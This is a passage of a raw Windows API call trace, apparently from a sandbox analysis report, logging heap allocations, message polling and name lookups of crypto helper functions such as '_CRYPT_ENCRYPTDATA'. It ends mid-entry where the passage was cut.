[0092.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14b8d) returned 0x452aba8 [0092.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0092.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.306] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14b8d) returned 0x4516010 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.307] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0092.307] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0092.307] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0092.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14b8d) returned 0x4516010 [0092.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14b8d) returned 0x499a008 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.309] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0092.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0092.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0092.309] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0092.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0092.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0092.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0092.309] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0092.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0092.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0092.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0092.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0092.310] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0092.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0092.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.311] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0092.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0092.311] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0092.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0092.312] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0092.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0092.312] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0092.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0092.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0092.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0092.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0092.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0092.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0092.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0092.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0092.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0092.315] HeapFree (in: hHeap=0x1780000, 